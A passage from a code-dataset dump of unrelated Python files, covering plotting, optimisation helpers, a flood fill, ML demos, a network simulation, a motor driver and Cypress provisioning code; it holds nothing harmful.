self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n#\n# self.ax.set_autoscaley_on(True)\n# self.ax.set_ylim(0, 65536)\n#\n# self.ax.grid()\n#\n# plt.show()\n#\n# @VisualizeBase.receiver(channel=4)\n# def update(self, value):\n# # append y value\n# self.y_value = np.append(self.y_value, np.mean(value))\n#\n# # increment x sample\n# self.x_sample = np.append(self.x_sample, self.x_sample[-1]+1)\n#\n# # place new data\n# # self.ax.plot(self.x_sample, self.y_value)\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.relim()\n# self.ax.autoscale_view()\n#\n# self.fig.canvas.draw()\n# self.fig.canvas.flush_events()\n# plt.show()\n\n # def __del__(self):\n # # If QApplication is closed attempt to kill the process\n # self.process.terminate()\n # # Wait for Xms and then elevate the situation to terminate\n # if not self.process.waitForFinished(10000):\n # self.process.kill()\n #\n # plt.close(fig=self.fig)\n\n#===================================================\n\n# graph\n# in init will launch itself in a new process (if below method doesn't work)\n# upon signal receipt, will show graph\n# run as daemon\n# import time\n#\n# class Graph(Process):\n#\n# def __init__(self, childpipe):\n# super().__init__()\n# self.pipe = childpipe\n# self.daemon = True\n#\n# def display(self):\n# self.data = None\n# self.x_sample = np.array([0])\n# self.y_value = np.array([0])\n#\n# self.fig, self.ax = plt.subplots()\n# self.lines, = self.ax.plot([], [], marker='o', linestyle='-')\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.set(xlabel=\"frame number\", ylabel=\"intensity\",\n# title=\"mean intensity during calibration\")\n#\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n#\n# self.ax.set_autoscaley_on(True)\n# self.ax.set_ylim(0, 65536)\n#\n# self.ax.grid()\n#\n# def run(self):\n# self.display()\n#\n# while True:\n# try:\n# time.sleep(0.01)\n# val = self.pipe.recv()\n# self.update(val)\n# except EOFError:\n# break\n#\n# def update(self, value):\n# # append y value\n# self.y_value = np.append(self.y_value, np.mean(value))\n#\n# # increment x sample\n# self.x_sample = np.append(self.x_sample, self.x_sample[-1]+1)\n#\n# # place new data\n# # self.ax.plot(self.x_sample, self.y_value)\n# self.lines.set_xdata(self.x_sample)\n# self.lines.set_ydata(self.y_value)\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.relim()\n# self.ax.autoscale_view()\n#\n# self.fig.canvas.draw()\n# self.fig.canvas.flush_events()\n#\n# # pyqtgraph\n#\n# from pyqtgraph.Qt import QtGui, QtCore\n#\n# class qtGraph(Process):\n#\n# def __init__(self, childpipe):\n# super().__init__()\n# self.pipe = childpipe\n# self.daemon = True\n#\n# def display(self):\n# # self.win2 = pg.GraphicsWindow(title=\"Basic plotting examples\")\n# # self.win2.resize(1000, 600)\n# # self.win2.setWindowTitle('pyqtgraph example: Plotting')\n# # self.p2 = self.win2.addPlot(title=\"calibration curve\")\n# # self.curve = self.p2.plot(pen='y')\n#\n# self.graphWidget = pg.PlotWidget()\n# self.y_value = []\n# self.x_sample = []\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n#\n# def run(self):\n# self.display()\n# while True:\n# val = self.pipe.recv()\n# self.update(val)\n#\n# def update(self, value):\n# # t = np.arange(0, 3.0, 0.01)\n# # s = np.sin(2 * np.pi * t + value)\n# # self.curve.setData(t, s)xz\n#\n# self.y_value = np.append(self.y_value, np.mean(value))\n# self.x_sample = np.append(self.x_sample, len(self.x_sample)+1)\n# # self.x_sample = np.append(self.x_sample, 1)\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n# QtGui.QGuiApplication.processEvents()\n#\n#\n# # manager\n# # only manager has decorated signals\n# # manager will receive constructed graph in its __init__\n# # manager will have decorated function to construct pipes\n# # set the pipe on the class\n# # launch graph updater in process with pipe as argument\n# #\n# # manager will send signal to pipes (or queues) upon pyqtSignals to UPDATE\n#\n#\n# class Manager(VisualizeBase):\n#\n# def __init__(self):\n# super().__init__()\n# self.mother_pipe = None\n# self.child_pipe = None\n#\n# @VisualizeBase.receiver(channel=20)\n# def new_calibration_plot(self, param):\n# self.mother_pipe, self.child_pipe = Pipe()\n# g = Graph(self.child_pipe)\n# # g = qtGraph(self.child_pipe)\n# g.start()\n#\n# @VisualizeBase.receiver(channel=4)\n# def update(self, value):\n# self.mother_pipe.send(value)\n#\n#\n# #===================================================\n#\n#\n# class RecorderCalibrationGraph(Process):\n#\n# def __init__(self):\n# super().__init__()\n#\n# self._child_pipe = None\n# self.daemon = True\n# self._queue = None\n#\n# self.graphWidget = pg.PlotWidget()\n# # self.setCentralWidget(self.graphWidget)\n#\n# self.x_sample = []\n# self.y_value = []\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n#\n# @property\n# def child_pipe(self):\n# return self._child_pipe\n#\n# @child_pipe.setter\n# def child_pipe(self, pipe):\n# self._child_pipe = pipe\n#\n# @property\n# def queue(self):\n# return self._queue\n#\n# @queue.setter\n# def queue(self, q):\n# self._queue = q\n#\n# def run(self):\n# \"\"\"\n# daemon process:\n# \"\"\"\n# # self.show()\n# pass\n# # while True:\n# # val = self.child_pipe.get()\n# # self._update_plot(val)\n#\n# def _update_plot(self, value):\n# self.y_value = np.append(self.y_value, np.mean(value))\n# self.x_sample = np.append(self.x_sample, len(self.x_sample)+1)\n# # self.x_sample = np.append(self.x_sample, 1)\n#\n# self.graphWidget.plot(self.x_sample, self.y_value)\n# # self.graphWidget.setXRange(len(self.x_sample), 1)\n#\n#\n# class MyQProcess:\n# def __init__(self):\n# self.win2 = pg.GraphicsWindow(title=\"Basic plotting examples\")\n# self.win2.resize(1000, 600)\n# self.win2.setWindowTitle('pyqtgraph example: Plotting')\n# self.p2 = self.win2.addPlot(title=\"calibration curve\")\n# self.curve = self.p2.plot(pen='y')\n# self.process = QProcess()\n# self.setupProcess()\n#\n# def setupProcess(self):\n# # Set the channels\n# self.process.setProcessChannelMode(QProcess.MergedChannels)\n# # Connect the signal readyReadStandardOutput to the slot of the widget\n# # self.process.readyReadStandardOutput.connect(self.readStdOutput)\n# # Run the process with a given command\n# self.process.start(\"df -h\")\n#\n# def __del__(self):\n# # If QApplication is closed attempt to kill the process\n# self.process.terminate()\n# # Wait for Xms and then elevate the situation to terminate\n# if not self.process.waitForFinished(10000):\n# self.process.kill()\n#\n# @pyqtSlot()\n# def readStdOutput(self):\n# # Every time the process has something to output we attach it to the QTextEdit\n# # self.edit.append(str(self.process.readAllStandardOutput()))\n# # self.edit.append(\"PROCESS RECEIVED SIGNAL\")\n# t = np.arange(0, 3.0, 0.01)\n# s = np.sin(2 * np.pi * t)\n# self.curve.setData(t, s)\n#\n#\n# class RecorderCalibrationGraphUpdateWindow(VisualizeBase):\n#\n# to_process = pyqtSignal(object)\n#\n# def __init__(self, calib):\n# super().__init__()\n# self.calibration = calib\n# self.parent_pipe = None\n#\n# @VisualizeBase.receiver(channel=20)\n# def new_calibration_plot(self, param):\n# self.p = MyQProcess()\n# self.to_process.connect(self.update)\n# # self.parent_pipe, child_pipe = Pipe()\n# # self.calibration.child_pipe = child_pipe\n# # queue = Queue()\n# # self.calibration.queue = queue\n# # self.calibration.start()\n# # Calibration Graph is a daemon Process\n# # mp = Processor(target=self.calibration.run, args=())\n# # mp.launch()\n# # self.calibration.start()\n#\n# @VisualizeBase.receiver(channel=4)\n# def update(self, value):\n# # send data to pipe\n# # self.parent_pipe.send(value)\n# self.to_process.emit(value)\n","sub_path":"recorder_polscope/recOrder/polscope/visualization/RecorderCalibPlot.py","file_name":"RecorderCalibPlot.py","file_ext":"py","file_size_in_byte":16357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61267958","text":"import numpy as np\nimport pandas as pd\n\n#Helper function for optimize function, to create eligible space levels\ndef createLevels(mergedPreOptCF,increment):\n\n minLevel = mergedPreOptCF.loc[:, 'Lower_Limit'].min()\n maxLevel = mergedPreOptCF.loc[:, 'Upper_Limit'].max()\n Levels = list(np.arange(minLevel, maxLevel + increment, increment))\n if 0.0 not in Levels:\n Levels.append(np.abs(0.0))\n\n print(Levels) #for unit testing\n\n return Levels\n\n# Helper function for createSPUByLevel function, to forecast weighted combination of sales, profit, and units\n# str_cat is the row of the curve-fitting output for an individual store and category\n# variable can take on the values of \"Sales\", \"Profit\", or \"Units\"\ndef forecast(str_cat, space, variable) :\n\n if space < str_cat[\"Scaled_BP_\" + variable]:\n value = space * (str_cat[\"Scaled_Alpha_\" + variable] *(erf((str_cat[\"Scaled_BP_\" + variable] - str_cat[\"Scaled_Shift_\" + variable]) / (math.sqrt(2) * str_cat[\"Scaled_Beta_\" + variable])))/ str_cat[\"Scaled_BP_\" + variable])\n else:\n value = str_cat[\"Scaled_Alpha_\" + variable] * erf((space - str_cat[\"Scaled_Shift_\" + variable]) / (math.sqrt(2) * str_cat[\"Scaled_Beta_\" + variable]))\n\n return value\n\n\n# Helper function for optimize function, to create objective function of SPU by level for Enhanced optimizations\ndef createNegSPUByLevel(Stores, Categories, Levels, curveFittingOutput, enhMetrics):\n\n # Create n-dimensional array to store Estimated SPU by level\n est_neg_spu_by_lev = np.zeros((len(Stores), len(Categories), len(Levels)))\n\n s = \"Sales\"\n p = \"Profit\"\n u = \"Units\"\n\n # Calculate SPU by level\n for (i, Store) in enumerate(Stores):\n for (j, Category) in enumerate(Categories):\n for (k, Level) in enumerate(Levels):\n str_cat = curveFittingOutput.loc[Store, Category]\n est_neg_spu_by_lev[i][j][k] = - ((enhMetrics[s] / 100) * forecast(str_cat, Level, s) + (enhMetrics[p] / 100) * forecast(str_cat, Level, p) + (enhMetrics[u] / 100) * forecast(str_cat, Level, u))\n\n return est_neg_spu_by_lev\n\n# Helper function for optimize function, to create objective function of error by level for Traditional optimizations\ndef createErrorByLevel(Stores, Categories, Levels,cf):\n\n # Create n-dimensional array to store error by level\n error = np.zeros((len(Stores), len(Categories), len(Levels)))\n\n # Calculate error by level\n for (i, Store) in enumerate(Stores):\n for (j, Category) in enumerate(Categories):\n for (k, Level) in enumerate(Levels):\n error[i][j][k] = np.absolute(cf.loc[Store, Category][\"Optimal Space\"] - Level)\n# error[i][j][k] = np.absolute(opt_amt[Category].iloc[i] - Level)\n\n return error\n","sub_path":"src/FixtureOptimization/optimizerFunctions.py","file_name":"optimizerFunctions.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"251101865","text":"\"\"\"Island problem.\"\"\"\ndef floodfill(i, j, row, col, island):\n \"\"\"Return 1 if (i, j) and its neighors are part of the island, 0 otherwise.\"\"\"\n count = 0\n if island[i][j] == 1:\n island[i][j] = 2\n eightdirections = [(1, 0), (-1, 0), (0, 1), (0, -1),\n (1, 1), (1, -1), (-1, 1), (-1, -1)]\n newpositions = [(i+x, j+y) for x, y in eightdirections]\n for posx, posy in newpositions:\n if posx in range(0, row) and posy in range(0, col):\n floodfill(posx, posy, row, col, island)\n count = 1\n return count\n \ndef count_island(row, col, island):\n \"\"\"Return total number of islands in the map.\"\"\"\n count = 0\n for i in range(row):\n for j in range(col):\n count = count + floodfill(i, j, row, col, island)\n return count\n \ndef make_matrix():\n \"\"\"Return number of rows, number of columns and matrix of island map.\"\"\"\n row, col = [int(x) for x in input().split()]\n island = [[int(x) for x in input().split()] for _ in range(row)]\n return row, col, island\n \ndef main():\n \"\"\"Get input for map and print number of islands.\"\"\"\n row, col, island = make_matrix()\n print(count_island(row, col, island))\n \nmain()\n","sub_path":"psit/PSIT/island/island.py","file_name":"island.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"89273238","text":"from sklearn import svm, metrics\r\n\r\n##0. 훈련데이터, 테스트데이터 준비\r\ntrain_data = [[0,0],[0,1],[1,0],[1,1]]\r\ntrain_label = [0,1,1,0]\r\ntest_data = [[1, 0], [0, 0]]\r\ntest_label = [1,0]\r\n\r\n#1. Classifier 생성(선택) --> 머신러닝 알고리즘 선택\r\nclf = svm.NuSVC(gamma = \"scale\") # clf는 classifier의 약자\r\n#2. 데이터로 학습 시키기\r\n#clf.fit( [ 훈련데이터 ], [ 정답 ])\r\nclf.fit (train_data, train_label)\r\n#3. 정답률을 확인(신뢰도)\r\nresults = clf.predict(test_data)\r\nscore = metrics.accuracy_score(results, test_label)\r\nprint(\"정답률 :\", score*100, '%')\r\n","sub_path":"강의자료/2019-06-24/Code14-02 머신러닝 scikit-learn 02.py","file_name":"Code14-02 머신러닝 scikit-learn 02.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370832166","text":"#!/usr/bin/env python3\nimport cv2\n#to start camera\ncap=cv2.VideoCapture(0) # 0 for default camera\nwhile cap.isOpened():\n\tstatus,frame=cap.read()\n\t#gray_frame=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n\tcv2.imshow('w',frame) #to add filter frame+50 i.e. BGR+50\n\t#cv.imshow('w1',gray_frame)\n\tif cv2.waitKey(25) & 0xFF == ord('q'):\n\t\tbreak\ncv2.destroyAllWindows()\ncap.release()\n","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"499594735","text":"from knowledge_model import Base, Knowledge\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///knowledge.db')\nBase.metadata.create_all(engine)\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\ndef add_article(topic,name,rating):\n\tarticle_object = Knowledge(\n\t\ttopic=topic,\n\t\tname=name,\n\t\trating=rating)\n\tsession.add(article_object)\n\tsession.commit()\n\nadd_article(\"astronomy\",\"black holes\",10)\nadd_article(\"weather\",\"rainbow\",9)\n\ndef query_all_articles():\n\tarticle=session.query(Knowledge).all()\n\treturn article\n# print(query_all_articles())\n\n\ndef query_article_by_topic(topic_name):\n\tarticle=session.query(Knowledge).filter_by(topic=topic_name).first()\n\treturn article\n# print(query_article_by_topic(\"astronomy\" ))\n\n\ndef delete_article_by_topic(topic_name):\n\tarticle=session.query(Knowledge).filter_by(topic=topic_name).delete()\n\tsession.commit()\n\n\n# print(query_all_articles())\n\ndef delete_article_by_rating(threshold):\n\tarticle_object=session.query(Knowledge).filter(rating>threshold).delete()\n\tsession.commit()\n\n\n\ndef delete_all_articles():\n\tarticle=session.query(Knowledge).delete()\n\tsession.commit()\n\t\n# delete_all_articles()\n\n\ndef\tedit_article_rating(topic,updated_rating):\n\tarticle_object=session.query(Knowledge).filter_by(topic=topic).first()\n\tarticle_object.rating=updated_rating\n\tsession.commit()\n \nedit_article_rating(\"weather\",10)\nprint(query_all_articles())\ndelete_article_by_rating(10)","sub_path":"exercises/knowledge_databases.py","file_name":"knowledge_databases.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427310441","text":"'''\r\nCreated on Oct 12, 2016\r\n\r\n@author: mwittie\r\n'''\r\nimport network_4 as network\r\nimport link_4 as link\r\nimport threading\r\nfrom time import sleep\r\n\r\n##configuration parameters\r\nrouter_queue_size = 0 #0 means unlimited\r\nsimulation_time = 35 #give the network sufficient time to transfer all packets before quitting\r\n\r\nif __name__ == '__main__':\r\n object_L = [] #keeps track of objects, so we can kill their threads\r\n\r\n # part 3 routing tables\r\n router_a_table = {1:2, 2:3, 3:0, 4:1};\r\n router_b_table = {1:1, 2:1, 3:0, 4:0};\r\n router_c_table = {1:1, 2:1, 3:0, 4:0};\r\n router_d_table = {1:2, 2:3, 3:0, 4:1};\r\n\r\n # part 3 network nodes\r\n host_1 = network.Host(1);\r\n host_2 = network.Host(2);\r\n host_3 = network.Host(3);\r\n host_4 = network.Host(4);\r\n router_a = network.Router(name='A', intf_count=4, table=router_a_table, max_queue_size=router_queue_size);\r\n router_b = network.Router(name='B', intf_count=2, table=router_b_table, max_queue_size=router_queue_size);\r\n router_c = network.Router(name='C', intf_count=2, table=router_c_table, max_queue_size=router_queue_size);\r\n router_d = network.Router(name='D', intf_count=4, table=router_d_table, max_queue_size=router_queue_size);\r\n object_L.extend([host_1, host_2, host_3, host_4, router_a, router_b, router_c, router_d]);\r\n\r\n #create a Link Layer to keep track of links between network nodes\r\n link_layer = link.LinkLayer()\r\n object_L.append(link_layer)\r\n\r\n # part 3 links\r\n # host to router links\r\n link_layer.add_link(link.Link(host_1, 0, router_a, 0, 70))\r\n link_layer.add_link(link.Link(host_2, 0, router_a, 1, 70))\r\n link_layer.add_link(link.Link(router_a, 2, host_1, 0, 70))\r\n link_layer.add_link(link.Link(router_a, 3, host_2, 0, 70))\r\n link_layer.add_link(link.Link(router_d, 0, host_3, 0, 70))\r\n link_layer.add_link(link.Link(router_d, 1, host_4, 0, 70))\r\n link_layer.add_link(link.Link(host_3, 0, router_d, 2, 70))\r\n link_layer.add_link(link.Link(host_4, 0, router_d, 3, 70))\r\n # router to router links\r\n link_layer.add_link(link.Link(router_a, 0, router_b, 0, 70))\r\n link_layer.add_link(link.Link(router_b, 1, router_a, 2, 70))\r\n link_layer.add_link(link.Link(router_a, 1, router_c, 0, 70))\r\n link_layer.add_link(link.Link(router_c, 1, router_a, 3, 70))\r\n link_layer.add_link(link.Link(router_b, 0, router_d, 0, 70))\r\n link_layer.add_link(link.Link(router_d, 2, router_b, 1, 70))\r\n link_layer.add_link(link.Link(router_c, 0, router_d, 1, 70))\r\n link_layer.add_link(link.Link(router_d, 3, router_c, 1, 70))\r\n\r\n # part 3 start objects\r\n thread_L = []\r\n thread_L.append(threading.Thread(name=host_1.__str__(), target=host_1.run))\r\n thread_L.append(threading.Thread(name=host_2.__str__(), target=host_2.run))\r\n thread_L.append(threading.Thread(name=host_3.__str__(), target=host_3.run))\r\n thread_L.append(threading.Thread(name=host_4.__str__(), target=host_4.run))\r\n thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))\r\n thread_L.append(threading.Thread(name=router_b.__str__(), target=router_b.run))\r\n thread_L.append(threading.Thread(name=router_c.__str__(), target=router_c.run))\r\n thread_L.append(threading.Thread(name=router_d.__str__(), target=router_d.run))\r\n\r\n thread_L.append(threading.Thread(name=\"Network\", target=link_layer.run))\r\n\r\n for t in thread_L:\r\n t.start()\r\n\r\n\r\n #create some send events\r\n host_2.udt_send(3, \"Message from host 2, intended to be received by host 3\")\r\n\r\n host_1.udt_send(4, \"Message from host 1, intended to be received by host 4\")\r\n\r\n host_3.udt_send(1, \"Message from host 3, intended to be received by host 1\")\r\n\r\n host_4.udt_send(2, \"Message from host 4, intended to be received by host 2\")\r\n\r\n\r\n # for i in range(3):\r\n # client.udt_send(2, 'Sample data %d' % i)\r\n\r\n\r\n #give the network sufficient time to transfer all packets before quitting\r\n sleep(simulation_time)\r\n\r\n #join all threads\r\n for o in object_L:\r\n o.stop = True\r\n for t in thread_L:\r\n t.join()\r\n\r\n print(\"All simulation threads joined\")\r\n\r\n\r\n\r\n# writes to host periodically\r\n","sub_path":"csci-466-networks/packet-segmentation-and-routing-lab/part4/simulation_4.py","file_name":"simulation_4.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"165417900","text":"#!/home/user/miniconda/envs/pytorch-1.5-cuda-10.1/bin/python\n \nfrom __future__ import print_function\nimport argparse\nimport click\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport random\nimport time\nimport os\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.fc1 = nn.Linear(9216, 128)\n self.dropout2 = nn.Dropout2d(0.25)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n\n return output\n\n\ndef train(log_interval, model, device, train_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print(f'Train Epoch: {epoch} [{batch_idx * len(data)}/{len(train_loader.dataset)}'\n f'({100. * batch_idx / len(train_loader):.0f}%)]\\tLoss: {loss.item():.6f}')\n\n\ndef test(model, device, test_loader):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print(f'\\nTest set: Average loss: {test_loss:.4f}, '\n f'Accuracy: {correct}/{len(test_loader.dataset)} ({100. * correct / len(test_loader.dataset):.0f}%)\\n')\n \n\n@click.command()\n@click.option('--seed', type=int, default=0)\n@click.option('--epochs', type=int, default=100)\n@click.option('--no-cuda', type=bool, default=False)\n@click.option('--log-interval', type=int, default=10)\ndef start_training(epochs, no_cuda, seed, log_interval):\n # Set all random seeds and possibly turn of GPU non determinism\n random_seed(seed, True)\n \n # Set GPU settings\n use_cuda = not no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n # Load training and testing data\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=64, shuffle=True, **kwargs)\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=64, shuffle=True, **kwargs)\n\n # Define model, device and optimizer\n model = Net()\n if torch.cuda.device_count() > 1:\n print(f'Using {torch.cuda.device_count()} GPUs!')\n model = nn.DataParallel(model)\n model.to(device)\n optimizer = optim.Adam(model.parameters())\n # scheduler = StepLR(optimizer, step_size=1, gamma=0.7) decaying LR \n optimizer.step()\n\n # Start training\n gpu_runtime = time.time()\n for epoch in range(1, epochs + 1):\n train(log_interval, model, device, train_loader, optimizer, epoch)\n test(model, device, test_loader)\n # scheduler.step()\n optimizer.step()\n\n print(f'GPU Run Time: {str(time.time() - gpu_runtime)} seconds')\n\n\ndef random_seed(seed, use_cuda):\n os.environ['PYTHONHASHSEED'] = str(seed) # Python general\n np.random.seed(seed) \n random.seed(seed) # Python random\n torch.manual_seed(seed)\n if use_cuda: \n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # For multiGPU\n torch.backends.cudnn.deterministic = True \n torch.backends.cudnn.benchmark = False # Disable \n\n\nif __name__ == '__main__':\n print(f'Num GPUs Available: {torch.cuda.device_count()}')\n\n start_training()\n","sub_path":"bin/train_mnist_pytorch.py","file_name":"train_mnist_pytorch.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181409378","text":"def counting_sort(arr):\n ct = [0] * 100\n for el in arr:\n ct[el] += 1\n idx = 0\n for i in range(len(ct)):\n for _ in range(ct[i]):\n arr[idx] = i\n idx += 1\n return ' '.join(list(map(str, arr)))\n\ndef solve():\n input()\n print(counting_sort([int(i) for i in input().split()]))\n\nif __name__ == '__main__':\n solve()\n","sub_path":"HackerRank/Algorithms/Sorting/countingsort_pt2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617790934","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.axis([0, 10, 0, 1])\nplt.ion()\nx = []\ny = []\nfor i in xrange(10):\n x.append(i)\n y.append(np.random.random())\n\nplt.scatter(x, y)\n\n","sub_path":"scripts/plots_tutorial.py","file_name":"plots_tutorial.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"110182122","text":"#\n# Based on: https://github.com/adafruit/micropython-adafruit-pca9685/blob/master/LICENSE\n#\n# The MIT License (MIT)\n#\n# Copyright (c) 2016 Radomir Dopieralski, written for Adafruit Industries\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom pyb import I2C\nimport ustruct, utime\n\nclass PCA9685:\n def __init__(self, i2c, address=0x40):\n self.i2c = i2c\n self.address = address\n self.reset()\n\n def _write(self, address, value):\n self.i2c.mem_write(bytearray([value]), self.address, address)\n #self.i2c.writeto_mem(self.address, address, bytearray([value]))\n\n def _read(self, address):\n return self.i2c.mem_read(1, self.address, address)[0]\n\n def reset(self):\n self._write(0x00, 0x00) # Mode1\n\n def freq(self, freq=None):\n if freq is None:\n return int(25000000.0 / 4096 / (self._read(0xfe) - 0.5))\n prescale = int(25000000.0 / 4096.0 / freq + 0.5)\n old_mode = self._read(0x00)\n self._write(0x00, (old_mode & 0x7F) | 0x10)\n self._write(0xfe, prescale)\n self._write(0x00, old_mode)\n utime.sleep_us(5)\n self._write(0x00, old_mode | 0xa1)\n\n def pwm(self, index, on=None, off=None):\n if on is None or off is None:\n data = self.i2c.readfrom_mem(self.address, 0x06 + 4 * index, 4)\n return ustruct.unpack(' 0:\n # Forward\n self._pin(in2, False)\n self._pin(in1, True)\n elif value < 0:\n # Backward\n self._pin(in1, False)\n self._pin(in2, True)\n else:\n # Release\n self._pin(in1, False)\n self._pin(in2, False)\n self.pca9685.duty(pwm, abs(value))\n\n def brake(self, index):\n pwm, in2, in1 = _DC_MOTORS[index]\n self._pin(in1, True)\n self._pin(in2, True)\n self.pca9685.duty(pwm, 0)","sub_path":"motors.py","file_name":"motors.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"321611258","text":"\"\"\"\nCopyright (c) 2019 Cypress Semiconductor Corporation\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom cysecuretools.execute.provisioning_lib.cyprov_entity import Entity\nfrom cysecuretools.execute.provisioning_lib.cyprov_crypto import Crypto\nfrom cysecuretools.execute.provisioning_lib.cyprov_types import Types\nfrom datetime import datetime, timedelta\n\n\n# Oem (Customr) Entity\nclass OemEntity(Entity):\n def __init__(self, state_name, audit_name):\n Entity.__init__(self, state_name, audit_name)\n \n def create_entity(self, chain_of_trust=[]):\n \"\"\"\n Creates the Oem entity.\n Creates the Oem main key-pair and returns nothing.\n \"\"\"\n oem_priv_key,oem_pub_key = Crypto.create_jwk()\n self.state[\"oem_priv_key\"] = oem_priv_key\n self.state[\"oem_pub_key\"] = oem_pub_key\n self.state[\"oem_chain_of_trust\"] = chain_of_trust\n \n def create_rot_authorization(self, signing_pkg):\n \"\"\"\n OEM creates a root-of-trust authorization package based on the signing key package from the HSM\n It's a JWT with two main parts:\n - a rot_auth authorization token that is sent to the device\n - a chain of X509 certificates that establishses the OEM's trust in the HSM signing key\n Note that this chain is not used inside the device and used only by 3rd parties\n \"\"\"\n oem_pub_key = self.state[\"oem_pub_key\"]\n oem_priv_key = self.state[\"oem_priv_key\"]\n oem_chain_of_trust = self.state[\"oem_chain_of_trust\"]\n \n # get HSM public key and check CY authorization\n signing_pkg_payload = Crypto.jwt_payload(signing_pkg)\n cy_auth = signing_pkg_payload[\"cy_auth\"]\n cy_auth_payload = 